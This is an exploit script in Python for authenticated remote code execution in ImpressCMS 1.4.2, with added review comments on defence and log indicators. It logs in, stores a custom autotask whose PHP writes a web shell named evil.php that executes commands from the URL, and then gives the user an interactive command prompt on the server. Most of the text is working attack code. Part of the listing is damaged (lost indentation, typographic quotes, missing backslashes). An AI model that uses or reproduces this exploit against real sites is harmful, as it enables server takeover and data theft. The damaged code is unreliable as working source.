# Exploit Title: ImpressCMS 1.4.2 – Remote Code Execution (RCE) (Authenticated)
# Date: 15-09-2021
# Exploit Author: Halit AKAYDIN (hLtAkydn)
# Vendor Homepage: https://www.impresscms.org/
# Software Link: https://www.impresscms.org/modules/downloads/
# Version: 1.4.2
# Category: Webapps
# Tested on: Linux/Windows
# ImpressCMS is a multilingual content management system for the web
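# The admin autotasks page (modules/system/admin.php?fct=autotasks) accepts custom task code
# from a logged-in user who may create tasks, and the CMS later runs that code.
# This autotask misconfiguration is the security vulnerability: such an account gains code execution on the server.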
# Example: python3 exploit.py -u http://example.com -l admin -p Admin123
import requests
import argparse
import sys
from time import sleep
# Module-level HTTP session: exploit() sends the login POST through it and
# then reads the ICMSSESSION cookie from its cookie jar.
session = requests.Session()
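def main():
    """Parse the command-line options and pass them to exploit().

    All three options are required: -u/--host (target base URL or host
    name), -l/--login (account name) and -p/--password (account password).
    """
    # The published listing carried typographic quotes and an en dash in the
    # long option names; argparse only accepts option strings starting with "-".
    parser = argparse.ArgumentParser(
        description='Impresscms Version 1.4.2 – Remote Code Execution (Authenticated)'
    )
    parser.add_argument('-u', '--host', type=str, required=True)
    parser.add_argument('-l', '--login', type=str, required=True)
    parser.add_argument('-p', '--password', type=str, required=True)
    args = parser.parse_args()

    # Banner; the leading/trailing "\n" were printed as a bare "n" in the listing.
    print("\nImpresscms Version 1.4.2 – Remote Code Execution (Authenticated)",
          "\nExploit Author: Halit AKAYDIN (hLtAkydn)\n")
    exploit(args)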
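def countdown(time_sec):
    """Print a once-per-second countdown on a single console line.

    Args:
        time_sec: Whole seconds to wait. Zero or a negative value returns
            immediately without printing or sleeping.
    """
    # "> 0" instead of plain truthiness so a negative value cannot loop forever.
    while time_sec > 0:
        mins, secs = divmod(time_sec, 60)
        # Show minutes too: with seconds alone a 60-second wait starts at "00".
        timeformat = '{:02d}:{:02d}'.format(mins, secs)
        # "\r" moves the cursor back to the line start so each tick overwrites the last.
        print("[" + timeformat + "] The task is expected to run!", end='\r')
        sleep(1)
        time_sec -= 1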
# Proof-of-concept flow for the authenticated ImpressCMS 1.4.2 autotask issue named in the file header.
# Steps as written: normalise and probe args.host; if <host>/evil.php already answers 200, go straight
# to the command prompt; otherwise log in through /user.php, submit a ":custom" autotask whose code
# writes ../evil.php, wait 60 seconds via countdown(), then open the same command prompt.
# NOTE(review): this listing was damaged in extraction - indentation is gone, quotes are typographic,
# and escape sequences such as "\n", "\r\n" and "\x24" appear to have lost their backslash. The code
# is kept exactly as published rather than reconstructed.
# Defensive reading: the precondition is an account that may create autotasks (see the
# "Unauthorized user" branch near the end). Hardening points this flow suggests: limit the autotasks
# admin function to the few accounts that need it, review stored autotasks for custom-code entries,
# and keep the web server user from writing into the document root.
# NOTE(review): whether a later ImpressCMS release changes this behaviour is not shown here - check
# the vendor's release notes.
def exploit(args):
# Normalise the target: keep an explicit http:// or https:// scheme, otherwise assume plain http://,
# and drop one trailing slash so later path concatenation does not produce "//".
if args.host.startswith((‘http://’, ‘https://’)):
print(“[?] Check Url…n”)
# No-op assignment (host is assigned to itself).
args.host = args.host
if args.host.endswith(‘/’):
args.host = args.host[:-1]
sleep(2)
else:
print(“n[?] Check Adress…n”)
args.host = “http://” + args.host
# No-op assignment (host is assigned to itself).
args.host = args.host
if args.host.endswith(‘/’):
args.host = args.host[:-1]
sleep(2)
# Reachability probe: anything other than HTTP 200 on the base URL, or a connection error, ends the run.
# No timeout is passed to this request.
try:
response = requests.get(args.host)
if response.status_code != 200:
print(“[-] Address not reachable!”)
sleep(2)
exit(1)
except requests.ConnectionError as exception:
print(“[-] Address not reachable”)
exit(1)
# Checks whether /evil.php is already present at the site root (HTTP 200). For a defender, an
# unexpected PHP file at that location is an indicator that this flow has already been run.
response = requests.get(args.host + “/evil.php”)
if response.status_code == 200:
print(“[*] Exploit file exists!n”)
sleep(2)
print(“[+] Exploit Done!n”)
# Interactive prompt: each input line is appended to the URL as the cmd query parameter. The value
# travels in the URL even though the method is POST, so these requests show up in ordinary access logs.
while True:
cmd = input(“$ “)
url = args.host + “/evil.php?cmd=” + cmd
headers = {
“Upgrade-Insecure-Requests”: “1”,
“User-Agent”: “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0”
}
response = requests.post(url, headers=headers, timeout=5)
if response.text == “”:
print(cmd + “: command not foundn”)
else:
print(response.text)
else:
# Login step: POST the supplied credentials to /user.php with op=login. A fixed ICMSSESSION value is
# sent with the request, and redirects are not followed.
url = args.host + “/user.php”
cookies = {
“ICMSSESSION”: “gjj2svl7qjqorj5rs87b6thmi5”
}
headers = {
“Cache-Control”: “max-age=0”,
“Upgrade-Insecure-Requests”: “1”,
“Origin”: args.host,
“Content-Type”: “application/x-www-form-urlencoded”,
“User-Agent”: “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36”,
“Accept”: “text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9”,
“Referer”: args.host,
“Accept-Encoding”: “gzip, deflate”,
“Accept-Language”: “en-US,en;q=0.9”,
“Connection”: “close”
}
data = {
“uname”: args.login,
“pass”: args.password,
“xoops_redirect”: “/”,
“op”: “login”
}
response = session.post(url, headers=headers, cookies=cookies, data=data, allow_redirects=False)
# Login success is judged only by whether the session's cookie jar now holds an ICMSSESSION value;
# the response status and body are not inspected.
new_cookies = session.cookies.get(“ICMSSESSION”)
if (new_cookies is None):
print(“[-] Login Failed…n”)
print(“Your username or password is incorrect.”)
sleep(2)
exit(1)
else:
print(“[+] Success Login…n”)
sleep(2)
# Task creation: a hand-built multipart/form-data POST to the system module's autotasks form
# (fct=autotasks&op=mod), sent with the ICMSSESSION value obtained above.
# Log signals visible in this request: the POST to that URL, the form fields sat_type=":custom" and
# sat_enabled=1, and a sat_code field holding PHP that calls file_put_contents() on ../evil.php.
# The boundary string, the User-Agent values and the task name (it appears to be "rce") are constants
# of this script, so they identify only unmodified copies of it.
url = args.host + “/modules/system/admin.php?fct=autotasks&op=mod”
cookies = {
“ICMSSESSION”: new_cookies
}
headers = {
“Cache-Control”: “max-age=0”,
“Upgrade-Insecure-Requests”: “1”,
“Origin”: args.host,
“Content-Type”: “multipart/form-data; boundary=—-WebKitFormBoundaryZ2hA91yNO8FWPZmk”,
“User-Agent”: “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36”,
“Accept”: “text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9”,
“Referer”: args.host + “/modules/system/admin.php?fct=autotasks&op=mod”,
“Accept-Encoding”: “gzip, deflate”,
“Accept-Language”: “en-US,en;q=0.9”,
“Connection”: “close”
}
data = “——WebKitFormBoundaryZ2hA91yNO8FWPZmkrnContent-Disposition: form-data; name=”sat_id”rnrn0rn——WebKitFormBoundaryZ2hA91yNO8FWPZmkrnContent-Disposition: form-data; name=”sat_lastruntime”rnrn0rn——WebKitFormBoundaryZ2hA91yNO8FWPZmkrnContent-Disposition: form-data; name=”sat_name”rnrnrcern——WebKitFormBoundaryZ2hA91yNO8FWPZmkrnContent-Disposition: form-data; name=”sat_code”rnrnfile_put_contents(‘../evil.php’, “<?php system(x24_GET[‘cmd’]); ?>”);rn——WebKitFormBoundaryZ2hA91yNO8FWPZmkrnContent-Disposition: form-data; name=”sat_repeat”rnrn0rn——WebKitFormBoundaryZ2hA91yNO8FWPZmkrnContent-Disposition: form-data; name=”sat_interval”rnrn0001rn——WebKitFormBoundaryZ2hA91yNO8FWPZmkrnContent-Disposition: form-data; name=”sat_onfinish”rnrn0rn——WebKitFormBoundaryZ2hA91yNO8FWPZmkrnContent-Disposition: form-data; name=”sat_enabled”rnrn1rn——WebKitFormBoundaryZ2hA91yNO8FWPZmkrnContent-Disposition: form-data; name=”sat_type”rnrn:customrn——WebKitFormBoundaryZ2hA91yNO8FWPZmkrnContent-Disposition: form-data; name=”sat_addon_id”rnrnrn——WebKitFormBoundaryZ2hA91yNO8FWPZmkrnContent-Disposition: form-data; name=”icms_page_before_form”rnrn”+args.host+”/modules/system/admin.php?fct=autotasksrn——WebKitFormBoundaryZ2hA91yNO8FWPZmk–rnContent-Disposition: form-data; name=”op”rnrnaddautotasksrn——WebKitFormBoundaryZ2hA91yNO8FWPZmkrnContent-Disposition: form-data; name=”modify_button”rnrnSubmitrn——WebKitFormBoundaryZ2hA91yNO8FWPZmk–rn”
# This request goes through requests.post, not the shared session, with the cookie passed explicitly.
response = requests.post(url, headers=headers, cookies=cookies, data=data, allow_redirects=False)
# The outcome is read from the redirect target: a Location of ...admin.php?fct=autotasks is treated
# as "task stored", a Location of /user.php as "this account may not create tasks".
if response.headers.get(“location”) == args.host + “/modules/system/admin.php?fct=autotasks”:
print(“[*] Task Create.n”)
sleep(2)
# Fixed 60-second wait for the stored task to run before the written file is used.
countdown(60)
print(“nn[+] Exploit Done!n”)
sleep(2)
# Same interactive prompt as in the "file exists" branch above; the cmd value is again carried in
# the URL of a POST to /evil.php.
while True:
cmd = input(“$ “)
url = args.host + “/evil.php?cmd=” + cmd
headers = {
“Upgrade-Insecure-Requests”: “1”,
“User-Agent”: “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0”
}
response = requests.post(url, headers=headers, timeout=5)
if response.text == “”:
print(cmd + “: command not foundn”)
else:
print(response.text)
elif response.headers.get(“location”) == args.host + “/user.php”:
print(“[!] Unauthorized user!nn”)
print(“Requires user with create task permissions.”)
sleep(2)
# Any other redirect target, or none at all, is ignored and the function ends without a message.
else:
pass
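# Run main() only when the file is executed as a script, not when imported.
# (The listing's typographic quotes around __main__ are restored to ASCII quotes.)
if __name__ == '__main__':
    main()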